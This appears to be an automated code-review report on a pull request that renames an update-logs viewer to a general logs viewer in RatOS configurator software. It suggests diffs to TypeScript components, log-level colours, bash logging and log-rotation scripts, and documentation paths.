29-36: Align CLI log colors with UI components

DEBUG/INFO color mismatch — CLI (src/cli/commands/logs.tsx: LOG_LEVELS) uses DEBUG=magenta, INFO=cyan; UI (src/app/logs/_components/types.ts: LOG_LEVELS) uses DEBUG=green, INFO=sky. Align them (recommend updating the CLI LOG_LEVELS to DEBUG→green and INFO→sky to match the UI).

configuration/scripts/ratos-log-rotation.sh (1)

1-325: Fix file permissions - script must be executable.

The pipeline failure indicates this script needs executable permissions.

Run the following command to fix the permissions:

#!/bin/bash
chmod +x configuration/scripts/ratos-log-rotation.sh
♻️ Duplicate comments (4)
src/app/logs/_components/types.ts (2)

6-6: time should be number (epoch ms), not string

Back-end and JSON logs typically emit numeric timestamps. Align type to prevent parsing/formatting bugs.

-  time: string;
+  time: number;

48-53: DEBUG color mapping should be pink per PR

Update to pink to match the documented scheme.

-  20: {
-    name: 'DEBUG',
-    color: 'text-green-700 dark:text-green-400',
-    bgColor: 'bg-green-50 dark:bg-green-400/10',
-    badgeColor: 'green',
-    icon: Bug,
-  },
+  20: {
+    name: 'DEBUG',
+    color: 'text-pink-700 dark:text-pink-400',
+    bgColor: 'bg-pink-50 dark:bg-pink-400/10',
+    badgeColor: 'pink',
+    icon: Bug,
+  },
src/app/logs/_components/logs-viewer.tsx (1)

57-59: handleClear doesn't actually clear the logs

The handleClear function just calls handleRefresh, which doesn't clear the logs. The clear mutation is triggered in LogSummaryHeader but the local state here isn't reset.

The handleClear callback should reset the filters to provide a true "clear" experience:

 const handleClear = () => {
-    handleRefresh();
+    // Reset all filters to defaults
+    setLogLevel('info');
+    setSelectedContexts([]);
+    setSelectedSources([]);
+    setShowDetails(false);
+    setShowOnlyErrors(false);
+    setSortDirection('desc');
+    // Then refresh to get clean data
+    refetch();
 };
src/app/logs/_components/use-unified-log-data.ts (1)

53-53: Remove the as any type assertion.

Using as any bypasses TypeScript's type checking and could lead to runtime errors.

🧹 Nitpick comments (55)
src/scripts/generate-mock-logs.js (1)

199-199: Stale “Update Logs” strings – please align to “Logs.”
Console messages still say “Generating mock update logs …” and “Update Logs Viewer.” Update to avoid UX confusion.

Apply this diff:

- console.log(`Generating mock update logs to: ${logPath}`);
+ console.log(`Generating mock logs to: ${logPath}`);
@@
- console.log('\nYou can now test the Update Logs Viewer with this mock data!');
+ console.log('\nYou can now test the Logs Viewer with this mock data!');

Also applies to: 236-236

src/scripts/generate-mock-update-logs.ts (2)

220-220: Stale wording — “update logs.”
Minor text tweak for consistency.

- console.log(`Generating mock update logs to: ${logPath}`);
+ console.log(`Generating mock logs to: ${logPath}`);

9-11: Remove unused sync fs imports.
writeFile/appendFile (sync) aren’t used; keep only promises API.

-import { writeFile, appendFile, existsSync, mkdirSync } from 'fs';
+import { existsSync, mkdirSync } from 'fs';
src/scripts/README-mock-logs.md (1)

95-107: Outdated heading: “Update Logs Viewer.”
Adjust to “Logs Viewer” to match the rename.

-## Testing the Update Logs Viewer
+## Testing the Logs Viewer
docs/logging-system.md (1)

384-395: Env var naming consistency (RATOS_LOG_FILE vs LOG_FILE).
Elsewhere (mock scripts, devbox env) you use LOG_FILE. Consider documenting both or standardizing to one.

Suggested doc tweak:

  • Note that the app also respects LOG_FILE (dev/local), while RATOS_LOG_FILE may be preferred for systemd/services. Add a short table clarifying precedence.
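One way the precedence could be expressed in shell, if standardizing on both names — this is a hypothetical sketch, not the app's actual resolution logic:

```shell
#!/usr/bin/env sh
# Hypothetical precedence: prefer RATOS_LOG_FILE when set, fall back to
# LOG_FILE, then a built-in default. The default path is illustrative.
RATOS_LOG_FILE=""
LOG_FILE="/tmp/app.log"
effective_log="${RATOS_LOG_FILE:-${LOG_FILE:-/var/log/ratos/configurator.log}}"
echo "$effective_log"
```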
.vscode/settings.json (1)

49-49: Terminal CWD set to src — verify this won’t break tasks/scripts

This can confuse tasks expecting repo root paths (e.g., package.json scripts, tooling). Consider leaving CWD default or scoping CWD per-task.

src/app/logs/_components/logs-error-boundary.tsx (2)

60-67: Logger call order — confirm expected signature

Some loggers expect error(obj, msg). You pass (msg, obj). Verify getLogger().error parameter order to ensure structured fields aren’t dropped.


71-77: Reload on reset is heavy

Consider letting resetErrorBoundary re-render without full window reload, or use router.refresh for a lighter recover.

src/scripts/change-hostname.sh (3)

33-37: Hostname validation too strict (no FQDN support)

Current regex disallows dots. If FQDNs are acceptable, allow dot-separated labels.

-if [[ ! "$NEW_HOSTNAME" =~ ^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$ ]]; then
+if [[ ! "$NEW_HOSTNAME" =~ ^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$ ]]; then

39-43: Add timeout to hostnamectl

Prevent hangs by using execute_with_logging’s timeout feature.

-if execute_with_logging "change_hostname" "HOSTNAME_CHANGE_FAILED" hostnamectl set-hostname "$NEW_HOSTNAME"; then
+if execute_with_logging "change_hostname" "HOSTNAME_CHANGE_FAILED" 10 hostnamectl set-hostname "$NEW_HOSTNAME"; then

23-26: Consistent error messaging

Prefix with “ERROR:” like other branches for consistency and easier parsing.

-    echo "Missing hostname parameter"
+    echo "ERROR: Missing hostname parameter"
LOGGING_SYSTEM.md (5)

Component names still use “Update”; rename to “Logs”

Keep docs consistent with the rename (LogsViewer, LogsErrorBoundary, etc.).

- - `UpdateLogsViewer`: Main component for displaying logs
- - `UpdateLogsErrorBoundary`: Error boundary for graceful error handling
+ - `LogsViewer`: Main component for displaying logs
+ - `LogsErrorBoundary`: Error boundary for graceful error handling

64-64: Headings flagged by markdownlint (trailing colon)

Remove trailing colons to satisfy MD026.

-#### Commands:
+#### Commands
-#### Usage Examples:
+#### Usage Examples
-#### TRPC Endpoints (`src/server/routers/logs.ts`):
+#### TRPC Endpoints (`src/server/routers/logs.ts`)
-#### REST Endpoints:
+#### REST Endpoints

Also applies to: 93-93, 134-134, 142-142


245-249: Clear vs rotate inconsistency

Earlier you state logs.clear is disabled; advise rotation instead.

- - Manually clear logs using `ratos update-logs clear` (CLI) or web UI
- - Adjust `RATOS_LOG_MAX_SIZE` if needed
+ - Use `ratos logs rotate` to rotate logs (clearing is disabled)
+ - Adjust rotation settings via environment if needed

157-168: time field sample vs actual format

Sample shows ISO string; pino/unified scripts often emit epoch ms. Confirm and align docs (and types.ts).

-  "time": "2024-01-01T10:00:00.000Z",
+  "time": 1704103200000,

If ISO is intended, document the formatter and ensure server emits strings.

Also applies to: 170-179


272-275: ShellCheck targets

Update example to include current scripts (e.g., change-hostname.sh) and remove obsolete paths.

-shellcheck -ax -s bash configuration/scripts/ratos-update.sh
+shellcheck -ax -s bash src/scripts/change-hostname.sh
LOG_OPTIMIZATION.md (3)

27-27: Path still references update-logs router

Rename to logs.ts to match codebase.

-Created a new `unified` endpoint in `src/server/routers/update-logs.ts` that:
+Created a new `unified` endpoint in `src/server/routers/logs.ts` that:

58-71: Client paths still under update-logs

Update to logs path to reflect the rename.

-Created `useUnifiedLogData` hook in `src/app/update-logs/_components/use-unified-log-data.ts` that:
+Created `useUnifiedLogData` hook in `src/app/logs/_components/use-unified-log-data.ts` that:

175-183: Files list uses update-logs paths

Align with src/app/logs/_components/*.

-- `src/app/update-logs/_components/use-unified-log-data.ts`
-- `src/app/update-logs/_components/types.ts`
-- `src/app/update-logs/_components/log-summary-header.tsx`
-- `src/app/update-logs/_components/log-entry-component.tsx`
-- `src/app/update-logs/_components/log-faceted-filter.tsx`
-- `src/app/update-logs/_components/enhanced-log-level-selector.tsx`
-- `src/app/update-logs/_components/virtualized-log-list.tsx`
+- `src/app/logs/_components/use-unified-log-data.ts`
+- `src/app/logs/_components/types.ts`
+- `src/app/logs/_components/log-summary-header.tsx`
+- `src/app/logs/_components/log-entry-component.tsx`
+- `src/app/logs/_components/log-faceted-filter.tsx`
+- `src/app/logs/_components/enhanced-log-level-selector.tsx`
+- `src/app/logs/_components/virtualized-log-list.tsx`
src/server/routers/logs.ts (2)

43-63: Consider paginating summary data for scalability

The unified endpoint design is excellent for performance. However, when includeSummary is true, the entire log file is still parsed and kept in memory to generate the summary. For large log files, this could cause memory issues.

Consider implementing incremental summary generation that processes the file in chunks, similar to how readObjects works with streaming:

-// Generate summary from log entries
-export function generateSummary(entries: LogEntry[], logFileSize: number, logFileExists: boolean): LogSummary {
+// Generate summary by streaming through log file
+export async function generateSummaryStream(logPath: string, filter?: (entry: LogEntry) => boolean): Promise<LogSummary> {

375-385: Redundant sorting for already sorted data

The entries are already sorted chronologically in parseLogFile (line 89), so sorting them again here is unnecessary unless the sort direction is 'asc'.

-// Apply server-side sorting
-filteredEntries = filteredEntries.sort((a, b) => {
-  const timeA = new Date(a.time).getTime();
-  const timeB = new Date(b.time).getTime();
-
-  if (input.sortDirection === 'desc') {
-    return timeB - timeA; // newest first
-  } else {
-    return timeA - timeB; // oldest first
-  }
-});
+// Apply server-side sorting only if needed (already sorted asc from parseLogFile)
+if (input.sortDirection === 'desc') {
+  filteredEntries = filteredEntries.reverse();
+}

Also applies to: 415-424

src/app/logs/_components/log-entry-component.tsx (2)

19-20: Type assertion bypass for badge color

The as any type assertions bypass TypeScript's type checking for the badge color prop. This could hide type mismatches.

-const borderStyle = badgeBorderColorStyle({ color: level.badgeColor as any });
-const bgStyle = badgeBackgroundMutedColorStyle({ color: level.badgeColor as any });
+// Ensure badgeColor is typed correctly in LOG_LEVELS
+import { z } from 'zod';
+import { badgeColorOptions } from '@/components/common/badge';
+
+type BadgeColor = z.infer<typeof badgeColorOptions>;
+const borderStyle = badgeBorderColorStyle({ color: level.badgeColor as BadgeColor });
+const bgStyle = badgeBackgroundMutedColorStyle({ color: level.badgeColor as BadgeColor });

34-38: Context badge only shown with details enabled

The context badge is only shown when showDetails is true (line 34), but the source badge is always shown (line 39). This inconsistency might confuse users.

Consider showing both badges consistently, either always or both controlled by showDetails.

configuration/scripts/beacon-update.sh (1)

29-34: Consider setting exit_code consistently for all failures

While the script sets exit_code=1 when update_beacon_fw fails, the root permission check on line 20 directly exits with code 1. For consistency with the error accumulation pattern used throughout the PR, consider using the exit_code variable there as well.

Apply this diff for consistency:

 if [ "$EUID" -ne 0 ]; then
     echo "ERROR: Please run as root"
     log_error "Script must run as root but was executed by non-root user" "main" "ROOT_REQUIRED"
-    exit 1
+    exit_code=1
+    create_log_summary "beacon-update.sh" "$START_TIME"
+    log_script_complete "beacon-update.sh" "$exit_code"
+    exit "$exit_code"
 fi
src/app/logs/_components/enhanced-log-level-selector.tsx (2)

46-48: Consider handling edge cases more explicitly

The fallback to level 3 (which doesn't exist in LOG_LEVELS) when selectedValue is undefined could cause issues. Consider using a valid default level.

Apply this diff to use a valid default:

 const selectedValue = logLevelOptions.find((option) => option.value === logLevel);
-const levelConfig = LOG_LEVELS[selectedValue?.level ?? 3];
-const count = getCountForLevel(selectedValue?.level ?? 3);
+const levelConfig = LOG_LEVELS[selectedValue?.level ?? 30]; // Default to INFO level
+const count = getCountForLevel(selectedValue?.level ?? 30);

60-62: Type assertion for Badge color prop should be avoided

Using as any type assertion bypasses TypeScript's type checking. Consider defining a proper type mapping.

Since the Badge component accepts specific color values, create a type-safe mapping:

+// Add this type mapping at the top of the component
+const COLOR_MAP: Record<string, Parameters<typeof Badge>[0]['color']> = {
+  gray: 'gray',
+  green: 'green', 
+  sky: 'sky',
+  yellow: 'yellow',
+  red: 'red',
+  purple: 'purple'
+};

 // Then use it in the Badge components:
-<Badge color={levelConfig.badgeColor as any} size="sm">
+<Badge color={COLOR_MAP[levelConfig.badgeColor] || 'gray'} size="sm">

Also applies to: 85-88

configuration/scripts/klipper-mcu-update.sh (1)

17-21: Consider consistent error handling pattern

Similar to beacon-update.sh, this script directly exits on root check failure instead of using the exit_code accumulation pattern.

For consistency with the error accumulation pattern:

 if [ "$EUID" -ne 0 ]; then
     echo "ERROR: This script should be run as root"
     log_error "Script must run as root but was executed by non-root user" "main" "ROOT_REQUIRED"
-    exit 1
+    exit_code=1
+    create_log_summary "klipper-mcu-update.sh" "$START_TIME"
+    log_script_complete "klipper-mcu-update.sh" "$exit_code"
+    exit "$exit_code"
 fi
configuration/scripts/ratos-install.sh (1)

81-81: verify_ready exits directly on root check

The verify_ready function calls exit 1 directly when run as root (line 64), which could bypass the error accumulation. Consider returning an error code instead.

Modify verify_ready to return an error instead of exiting:

 verify_ready()
 {
     log_info "Verifying script execution requirements" "verify_ready"
     if [ "$EUID" -eq 0 ]; then
         echo "This script must not run as root"
         log_error "Script attempted to run as root" "verify_ready" "ROOT_EXECUTION_DENIED"
-        exit 1
+        return 1
     fi
     log_info "Script execution requirements verified" "verify_ready"
+    return 0
 }
src/scripts/update.sh (1)

16-20: Direct exit in verify_ready should be reconsidered

The verify_ready function exits directly when not run as root, which bypasses the error accumulation pattern used elsewhere in the script.

Consider returning an error code instead:

 verify_ready()
 {
     log_info "Verifying script execution requirements" "verify_ready"
     if [ ! "$EUID" -eq 0 ]; then
         echo "This script must run as root"
         log_error "Script must run as root but was executed by non-root user" "verify_ready" "ROOT_REQUIRED"
-        exit 1
+        return 1
     fi
     log_info "Script execution requirements verified" "verify_ready"
+    return 0
 }
src/app/logs/_components/logs-viewer.tsx (1)

121-139: Good prop drilling but consider using context for deeply nested state

The component passes 13+ props to VirtualizedLogList. While this works, consider using React Context for filter state management to reduce prop drilling in future iterations.

For future consideration, a FilterContext could simplify state management:

// Example structure (not for immediate implementation)
const FilterContext = React.createContext<{
  logLevel: string;
  setLogLevel: (level: string) => void;
  // ... other filter states
}>({...});

// Usage in components would be cleaner:
const { logLevel, setLogLevel } = useContext(FilterContext);
scripts/test-logging-integration.sh (3)

8-11: Make BASE_DIR resolution portable (fallback if realpath is missing).

realpath isn’t available on all systems. Provide a readlink -f fallback to avoid failures on minimal/macOS environments.

Apply:

-BASE_DIR="$(realpath "$SCRIPT_DIR/..")"
+if command -v realpath >/dev/null 2>&1; then
+  BASE_DIR="$(realpath "$SCRIPT_DIR/..")"
+else
+  BASE_DIR="$(cd "$SCRIPT_DIR/.." && pwd -P)"
+fi

62-70: Don’t suppress source errors.

2>/dev/null hides why sourcing failed, making failures harder to diagnose. Drop the redirection or print the error path on failure.

-if source "$BASE_DIR/configuration/scripts/ratos-common.sh" 2>/dev/null; then
+if source "$BASE_DIR/configuration/scripts/ratos-common.sh"; then

36-46: Harden test harness flags.

Use set -Euo pipefail and trap EXIT to ensure cleanup even on abrupt errors.

-set -eo pipefail
+set -Eeuo pipefail
+trap 'rm -f "$TEST_LOG_FILE"' EXIT
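The cleanup-on-exit behavior of an EXIT trap can be observed with a small sketch: run the trap pattern in a subshell, then confirm the temp file is gone once the subshell exits.

```shell
#!/usr/bin/env sh
# Sketch: an EXIT trap removes the temp file on any exit path of the subshell.
tmp="$(sh -c 'T=$(mktemp); trap "rm -f \$T" EXIT; printf %s "$T"')"
if [ -f "$tmp" ]; then
  echo "leaked"
else
  echo "cleaned up"
fi
```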
src/app/logs/_components/log-faceted-filter.tsx (3)

41-46: Accessibility: add an accessible name to the trigger.

The button shows only an icon plus title; when title is short/non-descriptive, screen readers benefit from aria-label.

-<Button
+<Button
   variant="outline"
   size="default"
   className={`flex h-9 border-dashed ${disabled ? 'cursor-not-allowed opacity-50' : ''}`}
   disabled={disabled}
+  aria-label={`${title} filter`}
 >

88-91: Ensure checkbox toggles independently.

Relying on CommandItem onSelect works, but clicking the Checkbox itself won’t toggle without a handler. Wire onCheckedChange for direct toggling.

-<Checkbox checked={isSelected} />
+<Checkbox
+  checked={isSelected}
+  onCheckedChange={() => {
+    const newSelection = isSelected
+      ? selectedValues.filter((v) => v !== option)
+      : [...selectedValues, option];
+    onSelectionChange(newSelection);
+  }}
+/>

33-33: Micro‑perf: memoize selectedSet.

Avoid rebuilding Set on every render for large option lists.

-const selectedSet = new Set(selectedValues);
+const selectedSet = React.useMemo(() => new Set(selectedValues), [selectedValues]);
src/scripts/setup.sh (2)

28-34: Bound long-running npx with a timeout.

Network hiccups can stall the setup; execute_with_logging supports numeric timeout as first arg.

-if execute_with_logging "disable_telemetry" "TELEMETRY_DISABLE_FAILED" npx --yes -- next@13 telemetry disable; then
+if execute_with_logging "disable_telemetry" "TELEMETRY_DISABLE_FAILED" 60 npx --yes -- next@13 telemetry disable; then

64-73: Log summary likely counts nothing (filters on source="ratos-update").

create_log_summary filters by "ratos-update", but this script logs with contexts like main/script_lifecycle. Update the library to accept a source/context filter or provide a variant for per-script summaries; otherwise the summary will show zeros.

Would you like a follow-up PR to add a create_log_summary_for_source helper and switch this call accordingly?
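A per-source summary counter could be sketched along these lines, assuming one JSON object per line with a `source` field; the real `create_log_summary` signature and matching logic may differ.

```shell
#!/usr/bin/env sh
# Hypothetical per-source counter over a JSON-lines log file.
logfile="$(mktemp)"
cat <<'EOF' > "$logfile"
{"level":30,"time":1704103200000,"msg":"a","source":"ratos-update"}
{"level":50,"time":1704103201000,"msg":"b","source":"setup"}
{"level":30,"time":1704103202000,"msg":"c","source":"setup"}
EOF
count_for_source() {
  # Count lines whose source field matches $2 in file $1.
  grep -c "\"source\":\"$2\"" "$1"
}
count_for_source "$logfile" "setup"   # prints 2
```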

scripts/test-complete-logging-system.sh (2)

8-11: Same portability nit: avoid hard dependency on realpath.

-BASE_DIR="$(realpath "$SCRIPT_DIR/..")"
+if command -v realpath >/dev/null 2>&1; then
+  BASE_DIR="$(realpath "$SCRIPT_DIR/..")"
+else
+  BASE_DIR="$(cd "$SCRIPT_DIR/.." && pwd -P)"
+fi

6-6: Harden shell flags and ensure cleanup.

-set -eo pipefail
+set -Eeuo pipefail
+trap 'rm -f "$TEST_LOG_FILE" "$TEST_CONFIG_FILE"' EXIT
src/app/logs/_components/virtualized-log-list.tsx (3)

81-87: Label htmlFor has no matching control id.

The EnhancedLogLevelSelector doesn’t expose an input with id="log-level". Either add an id to its trigger or drop htmlFor to avoid an invalid association.

-<Label htmlFor="log-level" className={showOnlyErrors ? 'text-muted-foreground' : ''}>
+<Label className={showOnlyErrors ? 'text-muted-foreground' : ''}>
   Log Level
 </Label>

116-122: Don’t assume error has .message.

Type error as unknown and render safely to avoid runtime errors.

- error: any;
+ error: unknown;

And when rendering:

-<ErrorMessage title="Failed to load log entries">{error.message}</ErrorMessage>
+<ErrorMessage title="Failed to load log entries">
+  {error instanceof Error ? error.message : String(error)}
+</ErrorMessage>

54-61: Virtualizer margins based on refs may be stale.

scrollMargin/paddingEnd read null on first render and won’t update. Consider using a stateful value updated in a layout effect when containerRef mounts, then pass to useWindowVirtualizer.

I can provide a small refactor if you’d like.

src/__tests__/update-logs.test.ts (1)

81-100: Fix mixed async/await patterns in test.

The test uses async but doesn't await the promise returned by writeFile. This could lead to race conditions.

Apply this diff to ensure proper async handling:

-it('should skip invalid JSON lines and include all sources', async () => {
+it('should skip invalid JSON lines and include all sources', async () => {
 	const logContent = [
 		`{"level":30,"time":${new Date('2024-01-01T10:00:00.000Z').getTime()},"msg":"Valid entry","source":"ratos-update"}`,
 		'Invalid JSON line',
 		`{"level":50,"time":${new Date('2024-01-01T10:01:00.000Z').getTime()},"msg":"Another valid entry","source":"ratos-update"}`,
 		`{"level":30,"time":${new Date('2024-01-01T10:02:00.000Z').getTime()},"msg":"Different source","source":"other-service"}`,
 		`{"level":30,"time":${new Date('2024-01-01T10:03:00.000Z').getTime()},"msg":"Server entry"}`,
 	].join('\n');
 
 	await writeFile(TEST_LOG_FILE, logContent);
 
 	const parsedEntries = await parseLogFile(TEST_LOG_FILE);
 
 	expect(parsedEntries).toHaveLength(4); // All valid entries including different sources
 	expect(parsedEntries[0]?.msg).toBe('Valid entry');
 	expect(parsedEntries[1]?.msg).toBe('Another valid entry');
 	expect(parsedEntries[2]?.msg).toBe('Different source');
 	expect(parsedEntries[3]?.msg).toBe('Server entry');
 	expect(parsedEntries[3]?.source).toBe('server'); // Default source for entries without source
 });
src/app/logs/_components/log-summary-header.tsx (1)

90-100: Consider feature flag instead of NODE_ENV check.

Using process.env.NODE_ENV === 'development' for the test data generator could accidentally expose this feature if environment variables are misconfigured.

Consider using a more explicit feature flag:

-{process.env.NODE_ENV === 'development' && (
+{process.env.NEXT_PUBLIC_ENABLE_TEST_DATA_GENERATOR === 'true' && (
   <Button
     variant="outline"
     size="default"
     onClick={() => generateMockDataMutation.mutate()}
     disabled={generateMockDataMutation.isLoading}
   >
     <FileText className="h-4 w-4" />
     Generate Test Data
   </Button>
 )}
configuration/scripts/ratos-log-rotation.sh (2)

253-267: Consider making the systemd service name configurable.

The logrotate configuration is hardcoded to reload ratos-configurator. Consider making this configurable for flexibility.

 create_logrotate_config() {
     local log_file="$1"
     local config_file="/etc/logrotate.d/ratos-logging"
     local max_size="${2:-$DEFAULT_MAX_SIZE}"
     local backup_count="${3:-$DEFAULT_BACKUP_COUNT}"
     local compress="${4:-$DEFAULT_COMPRESS}"
+    local service_name="${5:-ratos-configurator}"
     
     echo "Creating logrotate configuration for $log_file"
     
     # Create logrotate configuration
     cat > "/tmp/ratos-logrotate.conf" << EOF
 $log_file {
     size $max_size
     rotate $backup_count
     missingok
     notifempty
     create 664 root root
     $([ "$compress" == "true" ] && echo "compress")
     $([ "$compress" == "true" ] && echo "delaycompress")
     postrotate
         # Signal processes to reopen log files if needed
-        systemctl reload-or-restart ratos-configurator 2>/dev/null || true
+        systemctl reload-or-restart $service_name 2>/dev/null || true
     endscript
 }
 EOF

275-279: Consider more verbose debug output for troubleshooting.

The logrotate validation redirects all output to /dev/null. Consider capturing and logging errors for troubleshooting.

 # Test the configuration
-if sudo logrotate -d "$config_file" >/dev/null 2>&1; then
+if output=$(sudo logrotate -d "$config_file" 2>&1); then
     echo "Logrotate configuration is valid"
 else
     echo "WARNING: Logrotate configuration may have issues" >&2
+    echo "Debug output: $output" >&2
 fi
src/scripts/common.sh (4)

113-120: Order systemd operations: daemon-reload before enable.

Enabling a brand-new unit before daemon-reload can fail on some systems. Swap the calls.

-            if execute_with_logging "install_or_update_service_file" "SERVICE_INSTALL_FAILED" sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"; then
-                if execute_with_logging "install_or_update_service_file" "SERVICE_ENABLE_FAILED" sudo systemctl enable ratos-configurator.service; then
-                    if execute_with_logging "install_or_update_service_file" "SYSTEMCTL_RELOAD_FAILED" sudo systemctl daemon-reload; then
+            if execute_with_logging "install_or_update_service_file" "SERVICE_INSTALL_FAILED" sudo mv /tmp/ratos-configurator.service "${SERVICE_FILE}"; then
+                if execute_with_logging "install_or_update_service_file" "SYSTEMCTL_RELOAD_FAILED" sudo systemctl daemon-reload; then
+                    if execute_with_logging "install_or_update_service_file" "SERVICE_ENABLE_FAILED" sudo systemctl enable ratos-configurator.service; then

162-166: Prefer command -v over which.

command -v pnpm is POSIX-specified and produces no extraneous output; which is a non-standard external tool whose behavior varies between systems (and may itself be shadowed by a shell function or alias).

-    if ! which pnpm &> /dev/null; then
+    if ! command -v pnpm &> /dev/null; then

218-218: Typo in user-facing status.

“Updatin” → “Updating”.

-        report_status "Updatin moonraker service permissions"
+        report_status "Updating moonraker service permissions"

380-392: Fix tmp filename mismatch; remove stray unused file.

You touch 030 but write/chown/cp 031, leaving an unused /tmp/030-... file.

-    touch /tmp/030-ratos-configurator-scripts
-    cat << __EOF > /tmp/031-ratos-configurator-scripts
+    touch /tmp/031-ratos-configurator-scripts
+    cat << __EOF > /tmp/031-ratos-configurator-scripts
configuration/scripts/ratos-logging-config.sh (1)

14-25: Quote default path value in associative array.

Guard against spaces in paths.

-    ["log_file"]=$RATOS_LOG_FILE
+    ["log_file"]="$RATOS_LOG_FILE"
configuration/scripts/ratos-logging.sh (3)

312-320: Avoid unconditional DEBUG echo during log-file creation.

Printing to stdout here can pollute callers’ output. Use log_debug or silence.

-    if [[ ! -f "$RATOS_LOG_FILE" ]]; then
-        echo "DEBUG: Log file $RATOS_LOG_FILE does not exist, creating it..."
+    if [[ ! -f "$RATOS_LOG_FILE" ]]; then
+        [[ "${RATOS_LOG_LEVEL}" == "debug" || "${RATOS_LOG_LEVEL}" == "trace" ]] && \
+          log_debug "Log file $RATOS_LOG_FILE does not exist, creating it..." "logging"

438-443: Align console colors with new scheme (INFO sky, DEBUG pink).

Matches PR’s updated level colors.

-        "info")
-            echo -e "\033[32m[$timestamp] INFO: $message\033[0m"
+        "info")
+            echo -e "\033[36m[$timestamp] INFO: $message\033[0m"
             ;;
         "debug")
-            if [[ $RATOS_LOG_LEVEL == "debug" || $RATOS_LOG_LEVEL == "trace" ]]; then
-                echo -e "\033[36m[$timestamp] DEBUG: $message\033[0m"
+            if [[ $RATOS_LOG_LEVEL == "debug" || $RATOS_LOG_LEVEL == "trace" ]]; then
+                echo -e "\033[35m[$timestamp] DEBUG: $message\033[0m"
             fi
             ;;
         "trace")
             if [[ $RATOS_LOG_LEVEL == "trace" ]]; then
-                echo -e "\033[35m[$timestamp] TRACE: $message\033[0m"
+                echo -e "\033[90m[$timestamp] TRACE: $message\033[0m"
             fi

Also applies to: 446-448


333-352: Consider non-zero returns on misuse of log_message.

Returning 0 on invalid inputs hides call-site bugs. If set -e is a concern, call-sites can append || true.
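A minimal sketch of what stricter input validation could look like (the function name and level set are taken from ratos-logging.sh, but this is a hypothetical standalone helper, not the actual implementation):

```shell
#!/bin/bash
# Hypothetical stricter variant: return non-zero on misuse instead of
# silently returning 0, so call-site bugs surface immediately.
log_message() {
    local level="$1" message="$2"
    case "$level" in
        trace|debug|info|warn|error) ;;
        *)
            echo "log_message: unknown level '$level'" >&2
            return 2
            ;;
    esac
    if [[ -z "$message" ]]; then
        echo "log_message: empty message" >&2
        return 2
    fi
    printf '[%s] %s\n' "$level" "$message"
}
```

Call-sites that run under `set -e` and deliberately tolerate misuse can opt out with `log_message "$lvl" "$msg" || true`, which keeps the default behavior strict without breaking existing scripts.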

📜 Review details

Configuration used: CodeRabbit UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 41e45e2 and cae6bbb.

📒 Files selected for processing (45)
  • .vscode/settings.json (1 hunks)
  • LOGGING_SYSTEM.md (3 hunks)
  • LOG_OPTIMIZATION.md (1 hunks)
  • configuration/scripts/beacon-update.sh (1 hunks)
  • configuration/scripts/environment.sh (1 hunks)
  • configuration/scripts/klipper-mcu-update.sh (1 hunks)
  • configuration/scripts/moonraker-update.sh (1 hunks)
  • configuration/scripts/ratos-common.sh (5 hunks)
  • configuration/scripts/ratos-install.sh (1 hunks)
  • configuration/scripts/ratos-log-rotation.sh (1 hunks)
  • configuration/scripts/ratos-logging-config.sh (1 hunks)
  • configuration/scripts/ratos-logging.sh (7 hunks)
  • docs/logging-system.md (1 hunks)
  • scripts/generate-devbox-environment.sh (2 hunks)
  • scripts/test-complete-logging-system.sh (1 hunks)
  • scripts/test-logging-integration.sh (1 hunks)
  • src/__tests__/update-logs.test.ts (6 hunks)
  • src/app/_hooks/navigation.ts (1 hunks)
  • src/app/logs/_components/enhanced-log-level-selector.tsx (1 hunks)
  • src/app/logs/_components/log-entry-component.tsx (1 hunks)
  • src/app/logs/_components/log-faceted-filter.tsx (1 hunks)
  • src/app/logs/_components/log-summary-header.tsx (1 hunks)
  • src/app/logs/_components/logs-error-boundary.tsx (4 hunks)
  • src/app/logs/_components/logs-viewer.tsx (1 hunks)
  • src/app/logs/_components/types.ts (1 hunks)
  • src/app/logs/_components/use-unified-log-data.ts (1 hunks)
  • src/app/logs/_components/virtualized-log-list.tsx (1 hunks)
  • src/app/logs/page.tsx (1 hunks)
  • src/app/update-logs/_components/update-logs-viewer.tsx (0 hunks)
  • src/app/update-logs/page.tsx (0 hunks)
  • src/cli/commands.tsx (2 hunks)
  • src/cli/commands/logs.tsx (4 hunks)
  • src/components/common/badge.tsx (1 hunks)
  • src/components/common/button.tsx (1 hunks)
  • src/components/ui/select.tsx (2 hunks)
  • src/scripts/README-mock-logs.md (1 hunks)
  • src/scripts/change-hostname.sh (1 hunks)
  • src/scripts/common.sh (1 hunks)
  • src/scripts/generate-mock-logs.js (1 hunks)
  • src/scripts/generate-mock-update-logs.ts (1 hunks)
  • src/scripts/setup.sh (1 hunks)
  • src/scripts/update.sh (1 hunks)
  • src/server/routers/index.ts (2 hunks)
  • src/server/routers/logs.ts (4 hunks)
  • src/tailwind.config.ts (1 hunks)
💤 Files with no reviewable changes (2)
  • src/app/update-logs/page.tsx
  • src/app/update-logs/_components/update-logs-viewer.tsx
🧰 Additional context used
🧬 Code graph analysis (26)
src/app/logs/_components/log-entry-component.tsx (2)
src/app/logs/_components/types.ts (2)
  • LogEntry (4-13)
  • LOG_LEVELS (30-82)
src/components/common/badge.tsx (3)
  • badgeBorderColorStyle (84-103)
  • badgeBackgroundMutedColorStyle (63-82)
  • Badge (197-204)
src/app/logs/_components/use-unified-log-data.ts (1)
src/app/logs/_components/types.ts (2)
  • LogSummary (15-28)
  • LogEntry (4-13)
src/scripts/update.sh (2)
configuration/scripts/ratos-logging.sh (9)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • log_info (456-456)
  • log_error (458-458)
  • execute_with_logging (464-616)
  • log_warn (457-457)
  • get_timestamp (110-113)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
src/scripts/common.sh (4)
  • report_status (15-22)
  • verify_users (311-317)
  • ensure_pnpm_installation (205-213)
  • pnpm_install (141-203)
src/scripts/setup.sh (2)
configuration/scripts/ratos-logging.sh (8)
  • setup_error_trap (619-627)
  • log_script_start (652-662)
  • log_info (456-456)
  • log_error (458-458)
  • execute_with_logging (464-616)
  • get_timestamp (110-113)
  • create_log_summary (677-694)
  • log_script_complete (665-674)
src/scripts/common.sh (10)
  • verify_users (311-317)
  • install_hooks (224-232)
